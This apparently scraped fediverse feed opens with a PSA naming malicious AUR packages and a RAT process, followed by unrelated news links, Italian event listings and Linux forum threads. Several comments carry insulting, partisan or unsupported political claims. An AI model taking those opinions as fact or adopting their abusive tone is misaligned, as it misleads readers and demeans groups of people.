like this
[PSA] Malware distributed on the AUR
On the 16th of July, at around 8pm UTC+2, a malicious AUR package was
uploaded to the AUR. Two other malicious packages were uploaded by the
same user a few hours later. These packages were installing a script
coming from the same GitHub repository that was identified as a Remote
Access Trojan (RAT).The affected malicious packages are:
- librewolf-fix-bin
- firefox-patch-bin
- zen-browser-patched-bin
The Arch Linux team addressed the issue as soon as they became aware of
the situation. As of today, 18th of July, at around 6pm UTC+2, the
offending packages have been deleted from the AUR.We strongly encourage users that may have installed one of these
packages to remove them from their system and to take the necessary
measures in order to ensure they were not compromised.
Follow up
There are more packages with this malware found.
minecraft-crackedttf-ms-fonts-allvesktop-bin-patchedttf-all-ms-fonts
What to do
If you installed any of these packages, check your running processes for one named systemd-initd (this is the RAT).
The suspicious packages have a patch from this now-inaccessible Codeberg repo:
codeberg.org/arch_lover3/brows…The Arch maintainers have been informed of all this already and are investigating.
like this
Washington wants the Ukrainian president to leave office—will it happen?
THE END FOR ZELENSKY?
Washington wants the Ukrainian president to leave office—will it happen?Seymour Hersh
Washington wants the Ukrainian president to leave office—will it happen?
THE END FOR ZELENSKY?
Washington wants the Ukrainian president to leave office—will it happen?Seymour Hersh
Israel can never take Hezbollah's weapons
Israel can never take Hezbollah's weapons
TEHRAN, Jul. 18 (MNA) – The chief of Lebanon's Hezbollah, Sheikh Naim Qassem, says that the Israeli regime will never be able to take Hezbollah's weapons, and they are ready to defend themselves in the event of Israeli aggression.Mehr News Agency
Pashinyan Acts As Copycat NATO-Backed Dictator And Is Turning Armenia Into Western Vassal – Expert
Pashinyan Acts As Copycat NATO-Backed Dictator And Is Turning Armenia Into Western Vassal – Expert
The legal conditions imposed by Armenian Prime Minister Nikol Pashinyan on the businessman and philanthropist Samwel Karapetyan are meaningless, Stevan Gajic, a political analyst from the Belgrade Institute of European Studies, says, noting that the …Sputnik International
There's a deep historical connection between Armenia (a former Soviet nation) and Russia that goes beyond politics. Russia has historically maintained influence on other nations to protect their own interests.
Anyone stupid enough to buy America's neo-liberal freedom spreading bullshit and willingly gives up their children's futures for quick loans to do short term improvements that were needed in part because of US sanctions is an idiot, and unfortunately like any other country, Armenia is full of idiots.
You'd think of all countries Armenia would be the first to speak up against Israel's genocide, with a quickly shrinking diaspora of Armenian Genocide survivors being persecuted in Palestine... But no, they wanted to make pappa USA proud and sided with Israel instead.
Armenia sold its future to help the dying American empire bounce back, and so did Lebanon. So tired of war, they let the US build a massive city-sized military compound with an airport on the top of a very strategic mountain and let them call it an embassy. People never learn.
Apple sues YouTuber who leaked iOS 26’s new “Liquid Glass” software redesign
Apple sues YouTuber who leaked iOS 26’s new “Liquid Glass” software redesign
YouTuber claims to “have receipts” disproving Apple’s allegations.Andrew Cunningham (Ars Technica)
thisisbutaname likes this.
Meta refuses to sign EU's AI code of practice | TechCrunch
Meta refuses to sign EU's AI code of practice | TechCrunch
Meta will not sign the EU's new rules, calling the implementation "over-reach"Ram Iyer (TechCrunch)
like this
This, plus the recent 'pay or consent' fiasco, makes pretty clear they are going straight for a deliberate collision route with the EU.
I assume they got some kind of political backing for it, it's a quite sudden all in. Sigh.
EDIT: Wrong link
Unicorndog
Also, George Takei was in the US concentration camp as a child, so...
Holy shit, it's true!😮
Also, that thing about George Takei, too, yeah. (HOLY SHIT!!)
Fediverse Village at HOPE
From August 15-17 2025, SWF will be helping to bring the Fediverse to HOPE. HOPE (Hackers on Planet Earth) is a grass-roots conference for hackers and developers in Queens in New York City. This year, I (Evan) will be speaking at the event on Aug 15 at 2PM ET, and we (SWF) will be organizing a Fediverse Village for HOPE_16.
Villages are available themed spaces in the St. John’s University campus to be used for coordinating activities. We’re hoping (!) to have talks, meetings, hacking events, and social gatherings at the Fediverse Village.
If you are involved in the Fediverse – or want to be – please join us at HOPE. There will be a lot of interesting and exciting things happening. And if you have good ideas for things to do at the Fediverse Village, please comment or let me know at @evanprodromou@socialwebfoundation.org.
[HOPE_16] Welcome to Hackers On Planet Earth!
HOPE_16 is an all-ages event with at least four speaker tracks, a whole bunch of workshops, awesome vendors, and fun activities throughout the entire weekend.hope.net
reshared this
Netanyahu ready for ‘significant concessions’ in Gaza ceasefire talks: Report
cross-posted from: lemmy.ml/post/33345095
News Desk
JUL 18, 2025
Israeli Prime Minister Benjamin Netanyahu has agreed to a withdrawal of troops from the Morag Corridor in southern Gaza, according to Hebrew reports, after several days of disagreements in indirect talks between Israel and Hamas over where Israeli forces would withdraw from during a potential ceasefire deal.Sources told Yedioth Ahronoth that a deal has been reached between Israel and Hamas on the latest withdrawal maps provided by Tel Aviv to mediators, after it conceded on the issue of the Morag Corridor.
Netanyahu stated in closed meetings that the Israeli delegation will remain in Qatar’s capital Doha until agreements are reached, and estimates suggest he is determined to secure a deal, according to the report.
Netanyahu ready for ‘significant concessions’ in Gaza ceasefire talks: Report
News Desk
JUL 18, 2025Israeli Prime Minister Benjamin Netanyahu has agreed to a withdrawal of troops from the Morag Corridor in southern Gaza, according to Hebrew reports, after several days of disagreements in indirect talks between Israel and Hamas over where Israeli forces would withdraw from during a potential ceasefire deal.Sources told Yedioth Ahronoth that a deal has been reached between Israel and Hamas on the latest withdrawal maps provided by Tel Aviv to mediators, after it conceded on the issue of the Morag Corridor.
Netanyahu stated in closed meetings that the Israeli delegation will remain in Qatar’s capital Doha until agreements are reached, and estimates suggest he is determined to secure a deal, according to the report.
Netanyahu ready for ‘significant concessions’ in Gaza ceasefire talks: Report
The premier is said to have agreed on a withdrawal of Israeli forces from the Morag Axis, which was established earlier this year and solidified Tel Aviv’s control of south Gazathecradle.co
A Prominent OpenAI Investor Appears to Be Suffering a ChatGPT-Related Mental Health Crisis, His Peers Say
A Prominent OpenAI Investor Appears to Be Suffering a ChatGPT-Related Mental Health Crisis, His Peers Say
Bedrock co-founder Geoff Lewis has posted increasingly troubling content on social media, drawing concern from friends in the industry.Joe Wilkins (Futurism)
like this
In this case, the United States. When healthcare is expensive and hard to access, not everybody gets it.
Syphilis symptoms can be so mild they go unnoticed. When you combine that with risky sexual behavior (hook-up culture, anti-condom bias) and lack of testing due to inadequate medical care, you can wind up with untreated syphilis. If you become homeless, care gets even harder to access.
You get diagnosed at a late stage when treatment is more difficult. They put you on a treatment plan, but followup depends on reliable transportation and the mental effects of the disease have made you paranoid. Now imagine you're also a member of a minority on which medical experiments have historically been done without consent or notice.
You don't really trust that those pills are for what you've been told at all. So difficulty accessing healthcare, changing clinics as you move around with medical history not always keeping up, distrust of the providers and treatment, and general instability and lack of regular routine all add up to only taking your medication inconsistently.
Result: under-treated syphilis
Netanyahu ready for ‘significant concessions’ in Gaza ceasefire talks: Report
News Desk
JUL 18, 2025
Israeli Prime Minister Benjamin Netanyahu has agreed to a withdrawal of troops from the Morag Corridor in southern Gaza, according to Hebrew reports, after several days of disagreements in indirect talks between Israel and Hamas over where Israeli forces would withdraw from during a potential ceasefire deal.Sources told Yedioth Ahronoth that a deal has been reached between Israel and Hamas on the latest withdrawal maps provided by Tel Aviv to mediators, after it conceded on the issue of the Morag Corridor.
Netanyahu stated in closed meetings that the Israeli delegation will remain in Qatar’s capital Doha until agreements are reached, and estimates suggest he is determined to secure a deal, according to the report.
Netanyahu ready for ‘significant concessions’ in Gaza ceasefire talks: Report
The premier is said to have agreed on a withdrawal of Israeli forces from the Morag Axis, which was established earlier this year and solidified Tel Aviv’s control of south Gazathecradle.co
I have an idea for to prevent broken links from Lemmy instances that shutting down
There will be a lot of lemm.ee/p/123 links around. As far as I understand, any server that federated with lemm.ee (e.g. lemmy.world) will continue to host the federated communities and posts forever.
So here's my proposal. We build a simple tool that says, when you visit lemm.ee/p/123, we check if that post exists on lemmy.world and forward you there. Doesn't necessarily have to be lemmy.world. We could even present the user with multiple instances to resolve the post from.
If you're interested in how this would work, it would utilize the resolve_object endpoint, which both Lemmy and PieFed implement.
Here are some examples of how you can still look up lemm.ee posts via the API of other instances:
- lemmy.world/api/v3/resolve_obj…
- lemmy.world/api/v3/resolve_obj…
- lemmy.world/api/v3/resolve_obj…
- lemmy.zip/api/v3/resolve_objec…
- lemmy.zip/api/v3/resolve_objec…
- piefed.social/api/alpha/resolv…
- piefed.world/api/alpha/resolve…
For this to really work smoothly, whoever owns the domains of the shut down instances would have to host this tool (e.g. lemm.ee would have to host it at lemm.ee). I have no idea how to get in touch with whoever owns the domain, but I would be happy to help build this.
Yeah absolutely! But it does feel more useful to have it live on the domain if possible.
I run my own Lemmy/PieFed client. I'm trying to think if there is a way to tell if an instance has shut down without hard coding a list. The hard part imo is telling if an instance is shut down vs temporarily down.
Though as I write this, I suppose this same feature could be used to resolve a post if an instance is temporarily down. So maybe I just ping /nodeinfo/2.1 and if it times out, I redirect.
What if an instance wants to disappear?
Edit: Oh, I see, this would be a service provided by whoever owns the shut-down domain.
Before Vegas: The “Red Hackers” Who Shaped China’s Cyber Ecosystem
Before Vegas: The “Red Hackers” Who Shaped China’s Cyber Ecosystem
This CSS Cyberdefense report by Eugenio Benincasa examines how a core group of red hackers from the 1990s and 2000s laid the groundwork for China’s modern cyber capabilities and traces their trajectories from early red hacker groups into professional…Center for Security Studies
Russia gearing up to prosecute internet users for searching ‘extremist’ content
Russia gearing up to prosecute internet users for searching ‘extremist’ content - Committee to Protect Journalists
Berlin, July 18, 2025—The Committee to Protect Journalists is alarmed by a bill under consideration in the Russian State Duma that would introduce fines for accessing or searching for “extremist” online content, threatening to further restrict press …CPJ Staff (Committee to Protect Journalists)
Sotto il cielo di Trevi (PG) accende l’estate di teatro e musica, la stagione in scena dal 19 luglio al 30 agosto 2025
Dal 19 luglio al 30 agosto torna a Trevi la magia della rassegna “Sotto il cielo di Trevi – Musica e teatro nel paesaggio”, promossa dal Teatro Belli di Antonio Salines con il patrocinio del Comune. Un cartellone che trasforma borghi, piazze e parchi in palcoscenici a cielo aperto, con spettacoli, emozioni e incontri.
Villa Fabri, la Chiesa di San Lorenzo, il Parco Agricolo, Piazza Mazzini, Matigge e Cannaiola ospiteranno artisti e compagnie in serate dedicate alla cultura, alla riflessione e al divertimento.
Ad aprire la rassegna, il 19 luglio, “L’impresario delle Smirne” di Goldoni con Gigi Savoia, per poi proseguire il 20 luglio a Matigge con “Contaminazioni poetiche” tra poesie e canzoni popolari. Il 26 luglio, Edoardo Siravo interpreta Achab in “Moby Dick”, mentre il 28 luglio va in scena “I Menecmi” di Plauto.
Il 1° agosto, “Voci di donne – Lettere a Mascagni” esplora il ruolo femminile nelle opere del compositore; il 3 agosto, tra musica e gastronomia, “Rossini e i sapori della musica”. Il 4 agosto omaggio a Pasolini con “Tutto il mio folle amore lo soffia il cielo”; il 5 agosto “Per futili motivi”, satira distopica su una società fondata sull’odio.
Il 22 agosto il “Sognatore” di Dostoevskij prende vita al Parco Agricolo; il 23, visita teatrale itinerante gratuita “Trevi, ovvero vissi d’amore e di merangole”. Il 24, alla Chiesa di San Francesco, “Domenico, un uomo buono”, su San Domenico da Foligno.
Il 29 agosto, concerto spettacolo dei Baraonna in Piazza Mazzini. Chiusura il 30 agosto a Cannaiola con “Canzoni sulla Luna” del gruppo The Eldar.
Biglietti: €10 a Villa Fabri, €3 altrove. Info: 327 818 4788 – compagnia@teatrobelli.it – Prevendite su VivaTicket.
Sotto il cielo di Trevi (PG) accende l'estate di teatro e musica, la stagione in scena dal 19 luglio al 30 agosto 2025 - ViaggieMiraggi
“Sotto il cielo di Trevi“ accende l’estate di teatro e musica Dal 19 luglio al 30 agosto 2025 torna la magia della stagione estiva firmata Teatro Belli di Antonio Salines con spettacoli, emozioni e incontri tra le vie, i parchi...Redazione (ViaggieMiraggi)
face and got upset enough from the sight of him to start comparing a chinese man to a yellow bear. 
Just skip to using slurs next time loser your not slick.
Trump can basically print infinite amounts of dollars through the federal reserve.
As we all know, conflicts are hella expensive and often decided by who can stay solvent longer. The fact that trump can just print dollars is extremely problematic here.
I guess the necessary course of action would be to bring the dollar's value to zero, and use an alternative currency instead (such as euro, canadian dollar, mexican pesos).
Festa del Vino, a Pergola (PU) dal 25 al 27 luglio 2025 si celebrano i 20 anni del Pergola Doc
Da venerdì 25 a domenica 27 luglio, il centro storico di Pergola, uno dei Borghi più Belli d’Italia, ospita la 53esima edizione della Festa del Vino, organizzata dalla Pro loco con il patrocinio del Comune. Un’edizione speciale che celebra i 20 anni del Pergola Doc, eccellenza locale sempre più apprezzata.
Tre giorni di iniziative dedicate all’“Oro Rosso” pergolese, tra degustazioni, riflessioni e festa. Venerdì alle 19.30, sotto i portici di Piazza Garibaldi, l’evento “A cena con Aleatico & Lacrima”: degustazione guidata di 9 vini (tra Pergola Doc, Uva Nera Rada e Lacrima di Morro d’Alba DOC), condotta dal sommelier Raffaele Papi, vicepresidente AIS Marche, con racconti e curiosità dei produttori. In abbinamento, menù speciale dello chef Filippo Petrolati. Prenotazione obbligatoria (tel. 388.0732931).
Sabato alle 17.30 in sala consiliare si terrà la tavola rotonda “20 anni di Pergola Doc”, con produttori ed esperti come Alberto Mazzoni (IMT), Luca Gambucci (AIS Marche Fabriano) e il produttore Stefano Tonelli, per ripercorrere la storia e il valore culturale del Pergola Doc. Modera Ubaldo Alimenti. A seguire degustazione sotto i portici.
Nel weekend, le cantine del centro storico proporranno degustazioni di Pergola Doc e specialità tipiche, accompagnate da musica, animazione, laboratori, arte, area bimbi e tanta ospitalità.
Info: social Pro loco Pergola.
Festa del Vino, a Pergola (PU) dal 25 al 27 luglio 2025 si celebrano i 20 anni del Pergola Doc - ViaggieMiraggi
Festa del Vino, a Pergola si celebrano i 20 anni del Pergola Doc Dal 25 al 27 luglio 2025: 3 giornate ricche di iniziative Un viaggio sensoriale tra tradizione, gusto e convivialità decollerà venerdì 25 luglio, quando a Pergola si...Redazione (ViaggieMiraggi)
I've read that MAX (typical horse taste of modern Russian official names, similar to Rosgvardia, Gosuslugi, Rostech and so on ; Soviet-time many-many-many caps abbreviations are boring, but somehow better) in its current early versions is a piece of spyware looking like Telegram, literally saving passwords and banking data and browsing history. Well, I'm almost certain Telegram itself is not much better.
Installed Briar on my phone and persuaded my sister, and to my grandma's today.
I like the idea of these meshes but until Linux phones become a practical option it doesn’t matter. Apple will restrict the hardware, Google will let Gemini spy on anything that passes through the phone, the phone situation is a mess.
I don’t really blame governments for that either. I blame fucking business majors.
A little background info:
Russia's been sponsoring one of its oligarchs' business by eliminating their competition.
First, they restricted YouTube's speed to an unusable state to force people to switch to RuTube (they didn't)
Now they're trying to force people to switch from WhatsApp (and potentially Telegram) to MAX, which they want to be Russia's version of WeChat.
-
Add the fact that our politicians are obsessed with controlling all of the media and you'll get the gist of it.
DOGE staffer with access to Americans' personal data leaked private xAI API key | TechCrunch
The creator of DOGE gets a taste of what he created.
That's called poetic justice.
DOGE staffer with access to Americans' personal data leaked private xAI API key | TechCrunch
The researcher who found the exposed key said it “raises questions” about how DOGE handles sensitive data.Zack Whittaker (TechCrunch)
like this
The Astronomer CEO's Coldplay Concert Fiasco Is Emblematic of Our Social Media Surveillance Dystopia | 404 Media
Archive link: archive.ph/aHrbK
The Astronomer CEO's Coldplay Concert Fiasco Is Emblematic of Our Social Media Surveillance Dystopia
Subscribe
Join the newsletter to get the latest updates.
Success
Great! Check your inbox and click the link.
Error
Please enter a valid email address.
The CEO seemingly having an affair with the head of HR at his company at the Coldplay concert is a viral video for the ages, but it is also, unfortunately, emblematic of our current private surveillance and social media hellscape.
The video, which is now viral on every platform that we can possibly think of, has been covered by various news outlets, and is Pop Crave official, shows Andy Byron, the CEO of a company called Astronomer, with his arms around Astronomer’s head of HR, Kristen Cabot. The jumbotron cuts from one fan to this seemingly happy couple. They both simultaneously die inside; “Oh look at this happy couple,” Coldplay lead singer Chris Martin says. The woman covers her face and spins away. The man ducks out of frame. “Either they’re having an affair or they’re very shy,” Martin said. The camera pans to another company executive standing next to them, who is seemingly shaking out of discomfort.
It is hard to describe how viral this is at the moment, in a world in which so many awful things are occurring and in which nothing holds anyone’s attention for any length of time and in a world in which we are all living in our own siloed realities. “Andy Byron” is currently the most popular trending Google term in the United States, with more than double the searches of the next closest term.
There are so many levels to this embarrassment—the Coldplay of it all, the HR violation occurring on jumbotron, etc—that one could likely write a doctoral dissertation on this 15 second video.
0:00
/0:19
1×This post is for subscribers only
Become a member to get access to all content
Subscribe nowThe Astronomer CEO's Coldplay Concert Fiasco Is Emblematic of Our Social Media Surveillance Dystopia
Facial recognition and crowdsourced social media investigations are constantly being used not just on cringe CEOs, but on random people who are simply existing in public.Jason Koebler (404 Media)
adhocfungus likes this.
DXVK 2.7 Improves Support for God of War, Watch Dogs 2, and Final Fantasy XIV
cross-posted from: lemmy.dbzer0.com/post/49276678
Coming about three weeks after DXVK 2.6.2, the DXVK 2.7 release adds support for the VK_EXT_descriptor_buffer Vulkan extension by default on newer AMD and NVIDIA GPUs to significantly reduce CPU overhead in games like Final Fantasy XIV, God of War, Metaphor: ReFantazio, Watch Dogs 2, and others.
DXVK 2.7 Improves Support for God of War, Watch Dogs 2, and Final Fantasy XIV
Coming about three weeks after DXVK 2.6.2, the DXVK 2.7 release adds support for the VK_EXT_descriptor_buffer Vulkan extension by default on newer AMD and NVIDIA GPUs to significantly reduce CPU overhead in games like Final Fantasy XIV, God of War, Metaphor: ReFantazio, Watch Dogs 2, and others.DXVK 2.7 Improves Support for God of War, Watch Dogs 2, and Final Fantasy XIV - 9to5Linux
DXVK 2.7 Vulkan-based implementation of D3D9, D3D10, and D3D11 for Linux / Wine is now available for download with various new features.Marius Nestor (9to5Linux)
like this
‘AI is not intelligent at all’: Why our dignity is at risk
‘AI is not intelligent at all’: Why our dignity is at risk | Charles Darwin University
The age of artificial intelligence (AI) has transformed our interactions, but threatens human dignity on a worldwide scale, according to a study led by Charles Darwin University (CDU).Charles Darwin University
Apple sues YouTuber who leaked iOS 26’s new “Liquid Glass” software redesign
According to the filing, Lipnik has been fired from Apple “for failing to follow Apple’s policies designed to protect its confidential information, including development devices and unreleased software and features.” The filing also accuses Lipnik of failing to report “multiple prior breaches” to Apple.
When you sign an NDA (non-disclosure agreement), you’d best protect the secrets. Then again, the guy who left an iPhone 4 in a bar didn’t lose his job. Wonder what the differences are between them.
Apple sues YouTuber who leaked iOS 26’s new “Liquid Glass” software redesign
YouTuber claims to “have receipts” disproving Apple’s allegations.Andrew Cunningham (Ars Technica)
adhocfungus likes this.
China issues safety warning for its nationals studying in the Philippines
China’s Education Ministry has issued a safety warning for Chinese students in the Philippines, following what it describes as a series of criminal incidents targeting Chinese nationals.
Archived version: archive.is/newest/apnews.com/a…
Disclaimer: The article linked is from a single source with a single perspective. Make sure to cross-check information against multiple sources to get a comprehensive view on the situation.
"Storia di un Guerriero Lakota. Sotto il blu di Skan" – Un Esordio Epico che Ha Già Conquistato i Lettori
Tim Walz says Trump ‘brings out the worst in people – and the worst in me’
Kamala Harris running mate strikes regretful tone after calling for Democrats to ‘bully the shit out of’ US president
Brazil passes controversial 'devastation bill' that weakens environmental regulations
Critics have called it "by far the worst piece of legislation” ever from an environmental standpoint.
Archived version: archive.is/newest/euronews.com…
Disclaimer: The article linked is from a single source with a single perspective. Make sure to cross-check information against multiple sources to get a comprehensive view on the situation.
Taiwan will 'not provoke confrontation' with China, vice president says
Taiwan's vice president says the self-ruled democracy will not provoke a confrontation with China and seeks to communicate with Beijing on the basis of parity and respect.
Archived version: archive.is/newest/apnews.com/a…
Disclaimer: The article linked is from a single source with a single perspective. Make sure to cross-check information against multiple sources to get a comprehensive view on the situation.
Arab Strap in tour a Roma, dopo 30 anni di carriera sempre riconoscibili anche se con uno stile diverso
Il duo indie-rock scozzese, in composto da Aidan Moffat e Malcolm Middleton, con trent’anni di attività sulle spalle, torna in Italia dopo l’uscita di I'm Totally Fine with It Don't Give a Fuck Anymore, uscito lo scorso 10 maggio. Tre le date italiane del tour: 23 luglio a Galzignano Terme all'Anfiteatro del Venda, il 24 luglio al Monk di Roma e il 25 luglio al Giardino Scotto di Pisa.
Con l'ultimo album gli Arab Strap non sembrano affatto preoccuparsi di rimanere fedeli all’identità sonora che, seppur evolvendo di volta in volta, li ha resi unici e distinguibili nel tempo. Già Bliss e ****Allatoncenes****, i singoli che avevano preceduto il lancio dell'ottava fatica in studio, sono due brani profondamente diversi tra loro che fungono da fiera testimonianza del loro focus sul futuro, sul cambiamento e sull’evoluzione.
I'm Totally Fine with It Don't Give a Fuck Anymore è un disco carico di tracce potenti e incisive, sia nella natura upbeat di alcuni dei momenti musicali più propulsivi, sia nel morso dei testi di Moffat. "Rispetto al nostro album precedente, c'è più rabbia e aggressività nelle parole", dice. "Non è apertamente politico ma è di sicuro un disco un po' arrabbiato con il mondo".
Il titolo (letteralmente traducibile come "per me va benissimo, non me ne frega più un...") potrebbe dare l'idea di una band che si stia arrendendo a qualcosa, in realtà fa riferimento a un messaggio del batterista live della band che Moffat ha trovato molto divertente e finisce per riflettere l'inaugurazione di un nuovo periodo di libertà creativa per gli Arab Strap.
i've been testing debian trixie with plasma wayland on nouveau and it looks promising
trixie (aka debian 13) is about to get released with plasma 6.3. it seems that finally x11 is being left behind, which is good, but it worried me a little bit because
- my nvidia graphics card is old: the 470 driver is the latest version that supports it (so no wayland support from nvidia proprietary drivers ever)
- on bookworm (debian 12, the current stable version), nouveau works pretty well, but it crashed more or less daily when i tried to daily drive it at work
x11 is still very well supported by plasma 6, but the near future has no place to it and i worry i would eventually get stuck without updates to my system as the newer versions lose x11 support. i decided to try wayland+nouveau again on trixie to see if i had better luck this time
it all worked way better than i expected. performance is seemingly on par with the proprietary driver, i've had no crashes so far and i've been using it for a week and even screensharing, one of the most problematic aspects of the experience last time i tried, worked well. the one problem i had was with the slack flatpak, which didn't support wayland for some reason, so it had to run on xwayland. screen sharing wayland applications from x11 apps is possible through the xwaylandvideobridge, which kinda works, but it crashed xwayland entirely at one point, killing both x11 applications i had running. i won't blame that on the system itself and installing the slack deb package fixed the problem anyway
all in all, it seems like i can safely switch to plasma 6+wayland+nouveau at work
like this
A huge problem with Debian Trixie is that it is shipping with NVIDIA drivers from before explicit sync was added (over a year ago). This is crazy to me.
But if you want to stay on X11, Debian Stable will support it for quite a few years yet even after KDE drops support.
If you are going to use Wayland (I do), it is worth using back ports to get newer NVIDIA drivers.
Debian Stable should really be called Debian Static (unchanging). Because they can ship unstable (crashy) software for years after other distros have moved on.
Inbox doesn't work on Voyager with Quokk.au
Can’t tell why. Inbox works great on all the other lemmy and piefed servers i’ve tried. But not quokk.au (piefed).
The inbox on quokk.au piefed web ui works good.
Distro advice for a specific case.
Back again haha, I asked a little while ago about making the switch from Windows to Linux and general consensus was maybe don't, as I use my PC for work doing voice acting, music production, and digital art.
Anyway, my PC has been crashing lately so I may be at the point soon of re-installing my OS, so I may as well bite the bullet if/when that happens. Right now I'm making some backups, making a list of Linux programs I'll need, and just trying to get my ducks in a row so I'm not scrambling if I wake up one morning and have to do the thing. Which brings me to Distros.
I've done some research into it but already but there are a bunch of options (thinking maybe Bazzite or Fedora?), and I'd rather know what I'm going with if my PC dies so I don't have to waste time trying to figure it out then. My PC specs are:
Processor 11th Gen Intel(R) Core(TM) i5-11400F @ 2.60GHz 2.59 GHz
Installed RAM 16.0 GB (15.9 GB usable)
NVIDIA GeForce RTX 3060
Obviously the priority is to get up and running but I'd really like to use a distro that I can learn some as well. I've installed Mint on an old laptop (recommended for being similar to Windows) but ideally I'd like a distro that's a bit more Linux-y. I'm ok taking some extra time getting up and running, though I'm not at a point for something like Arch yet haha.
EDIT: Wow, lots of comments, thanks! I think I've been overthinking it overall based on these responses. I have Mint on my old laptop and it works well, but had issues on my main laptop (Samsung Book3 Ultra) which I've read has to do with Samsung in general. I also had some issues with Nvidia on it but that may have been a Samsung issue more than anything else. My main PC uses Nvidia so I was under the impression that some distros just don't play well with it and wanted to make sure I used one that worked well with that graphics card.
Bottom line, I've been looking into Linux over the past few weeks and there's still distros mentioned here that I've never heard of haha. It seems really intimidating (hence why I asked) but I'm getting the impression that, at least for now, I'll just go Fedora to start when I bite the bullet. Arch looks really interesting but again, seems intimidating coming from Windows.
like this
rottanza sprecanza e la mattina nel gran cesso
Ancora non comprendo quale sia la logica universale che ogni tanto (anzi, ogni molto) porta la stabilità della mia anima a sfaldarsi pesantemente, ma, comunque sia, stamattina è successo un’altra volta… E continua tutt’ora nel pomeriggio, anche se, vabbè, ora ci sono le varie cose da fare, e quindi la marciscenza non attecchisce più di […]
Tundra
in reply to Xylight • • •like this
Mechanize likes this.
DirkMcCallahan
in reply to Tundra • • •Mark
in reply to DirkMcCallahan • • •slackness
in reply to Mark • • •cole
in reply to slackness • • •slackness
in reply to cole • • •aksdb
in reply to slackness • • •slackness
in reply to aksdb • • •juipeltje
in reply to slackness • • •copygirl
in reply to Mark • • •The "Arch cult's" holy book, the ArchWiki, states the following pretty clearly:
Mention of one's use of the AUR for their needs doesn't need to come with a disclaimer.
People who don't read or don't use their brain are going to keep not doing so, regardless.
like this
Mechanize likes this.
tehn00bi
in reply to copygirl • • •irotsoma
in reply to tehn00bi • • •AntennaArray
in reply to copygirl • • •Well, it's not like cults were known for actually following their holy books
like this
Mark likes this.
FuckBigTech347
in reply to copygirl • • •caseyweederman
in reply to Mark • • •muusemuuse
in reply to caseyweederman • • •Helix 🧬
in reply to muusemuuse • • •muusemuuse
in reply to Helix 🧬 • • •caseyweederman
in reply to muusemuuse • • •teawrecks
in reply to muusemuuse • • •teawrecks
in reply to Mark • • •Fecundpossum
in reply to DirkMcCallahan • • •The AUR, key words “user repository” is a specific weak point. It doesn’t have the same level of oversight that the main arch repo has. Stick to main repos and verified flatpaks and it’s very unlikely that you’d ever be compromised.
Linux isn’t perfect, but it’s certainly better than windows where you just download executables willy nilly to install your software.
HaraldvonBlauzahn
in reply to Fecundpossum • • •BTW python's package index has roughly the same problem - but a far less technical, experienced and critical user base. NPM has this problem since years.
Expect these problems to rise with every percent more of new Linux users which never learned the difference between opening / viewing untrusted data, and running untrusted code, because Windows basically ignores this essential concept and Android tries to solve that with sandboxing each app.
Nibodhika
in reply to DirkMcCallahan • • •That is sound advice, the AUR is most definitely not a trusted source though. For the normal arch repos the people who put the stuff there are known, they work for the project, you're as likely to get malware from one of those as you are to read an article bashing gamespot in gamespot, the people in charge of putting the packages there are the ones with more vested interest in things working so they won't knowingly introduce malicious code (plus it's a handful of people who know each other by first name).
The AUR is a different story, because anyone can put stuff there it's very easy to have malicious code end up there. It doesn't happen that often because most of the time it's fairly obvious and it gets flagged straight away, plus if people start doing that people will migrate away from the AUR, so it's a high risk low reward situation. But as more and more people start to use Arch derivatives that come with the AUR enabled without understanding any of this it becomes a more rewarding thing to exploit.
Dudewitbow
in reply to Nibodhika • • •caseyweederman
in reply to Dudewitbow • • •juipeltje
in reply to caseyweederman • • •NuXCOM_90Percent
in reply to DirkMcCallahan • • •Yeah. The I'm A Mac crowd had the same problem... god damn it, two or three decades ago.
As market share increases, platforms become a much bigger target for malware. And a lot of the "I don't need to run virus scans" crowds learn the hard way.
Its the same with open source. Obviously NOBODY around here would parrot this bullshit, but there is the idea that because something is FOSS it is safe. Code is only as safe as code review and there have been a few high profile cases of social engineering to get malicious code past even fairly rigorous review. Let alone "Well, that script is FOSS so somebody probably reviewed it" that we see so often.
like this
thirtyfold8625 likes this.
Mwa
in reply to Tundra • • •bacon_pdp
in reply to Tundra • • •Only for distributions which don’t do reproducible builds and require full and complete corresponding source code under an FSF approved license.
If you choose to download binary blobs, good fucking luck.
Elvith Ma'for
in reply to bacon_pdp • • •Mwa
in reply to Xylight • • •Voytrekk
in reply to Mwa • • •pyssla
in reply to Voytrekk • • •Sorry, but I fail to see this.
I suppose if you're accounting literally all independent distros, then you're probably right. However, if we'd be more realistic and compare it to other well-established independent distros^[I'm basically counting Alpine, Debian, Fedora, Gentoo, openSUSE, Slackware, Solus and Void. I didn't count Guix System and NixOS for how their 'repositories' are built different and therefore not easily comparable to the others.], then we notice that the vastness of the packages found in Arch's repository is rather lackluster at the very least. Heck, by virtually all metrics, Arch together with its derivatives undoubtedly belong in the upper echelons of usage stats; only being second to the Debian-family of distros. IMO, however, the size of its repository absolutely doesn't reflect this; as it's only bigger than Slackware, Solus and Void. The inclusion of these smaller projects is arguably charitable on my side*. But to drive the point home very clearly: Arch's repository is smaller than Alpine's, Debian's, Fedora's, openSUSE's and Gentoo's with a ratio of (about) two to one (except for openSUSE).
DistroWatch.com: Put the fun back into computing. Use Linux, BSD.
distrowatch.comVoytrekk
in reply to pyssla • • •I don't know if raw package counts is the best comparison. Unlike say Fedora, Arch bundles everything related to a project in the same file. If you want Qt6-base on Arch, that is one package. If you want it on Fedora, it is going to have a lib, header, docs, and maybe a few other packages.
Just from personal experience, I do not have issues with finding packages in the main repos, with only a handful of my packages coming from the AUR. This is not the case with others, like Fedora where extra repos need to be added, like EPEL and RPM Fusion.
pyssla
in reply to Voytrekk • • •Thank you for the quick response!
You're probably right. Do you think we got anything better to go by?
Can't comment on this. Though, the list of packages with qt6 in their name is considerably longer in Fedora. However, I wonder if this simply reflects that Fedora, by virtue of having a larger repository, also has more stuff related to qt6. Or, as you posited it, chooses to package the same content over multiple packages instead of bundling them like it's supposedly happening on Arch.
Hmm..., I feel you might be conflating stuff. Please allow me to elaborate on what I mean.
Fedora is not able to include some packages in its own repository due to legal reasons. As such, these are relayed to RPM Fusion instead. Which means that a well-functioning Fedora installation (almost necessarily) desires to install some packages from RPM Fusion. So, RPM Fusion exists as a 'hack' of sorts to protect Fedora from legal charges and NOT because they're too lazy (or something) to ship those packages themselves. To be clear, RPM Fusion is accepted as a trusted third-party repository.
Arch, on the other hand, is rather lenient on what they can include in their repositories. Basically enabling them to package within their repositories all codecs and whatnot without them being visibly worried about the legal consequences of this ordeal.
